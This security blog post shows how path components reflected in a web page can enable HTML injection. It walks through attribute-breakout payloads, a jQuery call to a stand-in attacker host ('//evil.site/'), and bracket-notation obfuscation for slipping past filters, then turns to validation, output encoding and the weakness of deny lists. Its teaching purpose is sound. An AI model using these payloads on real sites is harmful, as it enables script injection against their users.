On a Path to HTML Injection

URLs guide us through the trails among web apps. We follow their components (schemes, hosts, ports, querystrings) like breadcrumbs. They lead to the bright meadows of content. They lead to the dark thickets of forgotten pages. Our browsers must recognize when those crumbs take us to infestations of malware and phishing.

And developers must recognize how those crumbs lure dangerous beasts to their sites.

The apparently obvious components of URLs (the aforementioned origins, paths, and parameters) entail obvious methods of testing. Phishers squat on FQDN typos and IDN homoglyphs. Other attackers guess alternate paths, looking for /admin directories and backup files. Others deliver SQL injection and HTML injection (a.k.a. cross-site scripting) payloads into querystring parameters.

But URLs are not always what they seem. Forward slashes don’t always denote directories. Web apps might decompose a path into parameters passed into backend servers. Hence, it’s important to pay attention to how apps handle links.

A common behavior for web apps is to reflect URLs within pages. In the following example, we’ve requested a link, https://web.site/en/dir/o/80/loch, which shows up in the HTML response like this:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch" />

There’s no querystring parameter to test, but there are still plenty of items to manipulate. Imagine a mod_rewrite rule that turns ostensible path components into querystring name/value pairs. A link like https://web.site/en/dir/o/80/loch might become https://web.site/en/dir?o=80&foo=loch within the site’s nether realms.
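To make that concrete, here is a minimal Python sketch of the kind of rewrite a server might perform. The pattern, the function name rewrite_path, and the parameter names o and foo are assumptions carried over from the hypothetical link above, not the site’s actual rule.

```python
import re
from urllib.parse import urlencode

# Hypothetical rule: /<lang>/dir/o/<id>/<name>  ->  /<lang>/dir?o=<id>&foo=<name>
REWRITE = re.compile(r"/(?P<lang>[a-z]{2})/dir/o/(?P<o>[^/]+)/(?P<foo>[^/]+)")

def rewrite_path(path: str) -> str:
    """Turn ostensible path components into querystring name/value pairs."""
    match = REWRITE.fullmatch(path)
    if match is None:
        return path  # no rule applies; leave the path untouched
    query = urlencode({"o": match["o"], "foo": match["foo"]})
    return f"/{match['lang']}/dir?{query}"

print(rewrite_path("/en/dir/o/80/loch"))  # /en/dir?o=80&foo=loch
```

Every captured segment is a parameter in disguise, so each one deserves the same testing a querystring value would get.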

We can also dump HTML injection payloads directly into the path. The URL shows up in a quoted string, so the first step could be trying to break out of that enclosure:

https://web.site/en/dir/o/80/loch"onmouseover=alert(9);"

The app neglects to filter the payload although it does transform the quotation marks with HTML encoding. There’s no escape from this particular path of injection:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch&quot;onmouseover=alert(9);&quot;" />
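The encoding seen in that link element is what a standard HTML escaping routine produces. As a small sketch, Python’s html.escape reproduces the same output; the variable names are illustrative, and nothing here is known about the site’s real implementation.

```python
from html import escape

requested = 'https://web.site/en/dir/o/80/loch"onmouseover=alert(9);"'

# With quote=True (the default), escape() converts " to &quot;, so the payload
# stays inside the href value instead of terminating it.
link_tag = f'<link rel="canonical" href="{escape(requested, quote=True)}" />'
print(link_tag)
```

Because the quotation marks arrive as character references, the browser treats them as part of the attribute value and the onmouseover text never becomes an attribute of its own.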

However, if you’ve been reading here often, then you’ll know by now that we should keep looking. If we search further down the page a familiar vuln scenario greets us. (As an aside, note the app’s usage of two-letter language codes like en and de; sometimes that’s a successful attack vector.) As always, partial security is complete insecurity.

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=alert(9);"?kosid=80&type=0&step=1">Deutsch</a>

We probe the injection vector and discover that the app redirects to an error page if characters like < or > appear in the URL:

Please tell us (us@web.site) how and on which page this error occurred.

The error also triggers on invalid UTF-8 sequences and NULL (%00) characters. So, there’s evidence of some filtering. That basic filter prevents us from dropping in a <script> tag to load external resources. It also foils character encoding tricks meant to confuse and bypass the filters.
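The observed behavior is consistent with a character-level check along these lines. This is only a guess at the logic, written in Python for illustration; the function name triggers_error_page and the exact set of rejected characters are assumptions based solely on the probes described above.

```python
from urllib.parse import unquote_to_bytes

def triggers_error_page(raw_path: str) -> bool:
    """Guess at the filter: reject <, >, NULL bytes, and invalid UTF-8."""
    data = unquote_to_bytes(raw_path)  # percent-decode to raw bytes
    try:
        text = data.decode("utf-8", errors="strict")
    except UnicodeDecodeError:
        return True  # invalid UTF-8 sequence
    return any(ch in text for ch in "<>\x00")

print(triggers_error_page("/en/dir/o/80/loch%3Cscript%3E"))                 # True
print(triggers_error_page("/en/dir/o/80/loch%22onmouseover=alert(9);%22"))  # False
```

A check like this stops new tags from being created, but it says nothing about quotation marks, which are all the earlier attribute breakout needs.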

Popular HTML injection examples have relied on <script> tags for years. Don’t let that limit your creativity. Remember that the rise of sophisticated web apps has meant that complex JavaScript libraries like jQuery have become pervasive. Hence, we can leverage JavaScript that’s already present to pull off attacks like this:


<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=$.get("//evil.site/");"?kosid=80&type=0&step=1">Deutsch</a>

We’re still relying on the mouseover event and therefore need the victim to interact with the web page to trigger the payload’s activity. The payload hasn’t been injected into a form field, so the HTML5 autofocus/onfocus trick won’t work.

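We could further obfuscate the payload in case some other kind of filter is present. One illustrative option is JavaScript’s bracket notation: $["get"]("//evil.site/") calls the same jQuery function as $.get("//evil.site/") without the literal text .get appearing in the URL.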


Parameter validation and context-specific output encoding are two primary countermeasures for HTML injection attacks. The techniques complement each other: effective validation prevents malicious payloads from entering an app, and correct encoding prevents a payload from changing a page’s DOM. With luck, an error in one will be compensated for by the other. But it’s a bad idea to rely on luck, especially when there are so many potential errors to make.
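As a rough illustration of the two layers working together, the Python sketch below validates each path segment against an allow list and then encodes the value for an HTML attribute. The segment pattern and the helper names validate_path and language_link are assumptions made for this example; a real app would tailor the allowed characters to its own routes.

```python
import re
from html import escape

# Assumed allow list: segments made only of letters, digits, hyphen, underscore.
SEGMENT = re.compile(r"[A-Za-z0-9_-]+")

def validate_path(path: str) -> bool:
    """Validation: accept the path only if every segment matches the allow list."""
    segments = path.strip("/").split("/")
    return all(SEGMENT.fullmatch(seg) for seg in segments)

def language_link(path: str, label: str) -> str:
    """Encoding: escape for attribute and text contexts, even after validation."""
    return f'<a href="{escape(path, quote=True)}">{escape(label)}</a>'

bad = '/de/dir/o/80/loch"onmouseover=alert(9);"'
print(validate_path("/de/dir/o/80/loch"))  # True
print(validate_path(bad))                  # False
print(language_link(bad, "Deutsch"))
```

Either layer alone would have stopped the payload shown earlier. Keeping both means a gap in the allow list or a forgotten call to the encoder is not immediately exploitable.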

Two weaknesses enable attackers to shortcut what should be secure paths through a web app:

  • Validation routines must be applied to all incoming data, not just parameters. Form fields and querystring parameters may be the most notorious attack vectors, but they’re not the only ones. Request headers and URL components are just as easy to manipulate.
  • Blacklisting often fails because developers have a poor understanding of, or a limited imagination for, how exploits are crafted. Even worse are filters built solely from observing automated tools, an approach that leads to naive defenses like blocking alert or <script>.
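The second weakness is easy to demonstrate. The Python sketch below is a deliberately naive deny list of the kind just described; the function name naive_filter and the blocked strings are illustrative assumptions, not any particular product’s rules.

```python
# Deny list built from what automated scanners typically send.
BLOCKED = ("<script", "alert")

def naive_filter(value: str) -> bool:
    """Return True if the value passes the deny list."""
    lowered = value.lower()
    return not any(token in lowered for token in BLOCKED)

payloads = [
    'loch"onmouseover=alert(9);"',               # blocked: contains "alert"
    'loch"onmouseover=$.get("//evil.site/");"',  # passes: reuses jQuery already on the page
]
for p in payloads:
    print(naive_filter(p), p)
```

The filter stops the scanner’s test string and nothing else, which is why an allow list of expected input tends to hold up better than a list of known-bad strings.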

Output encoding must be applied consistently. It’s one thing to have designed a strong function for inserting text into a web page; it’s another to make sure it’s implemented throughout the app. Attackers are going to follow these breadcrumbs through your app. Be careful, lest they eat a few along the way.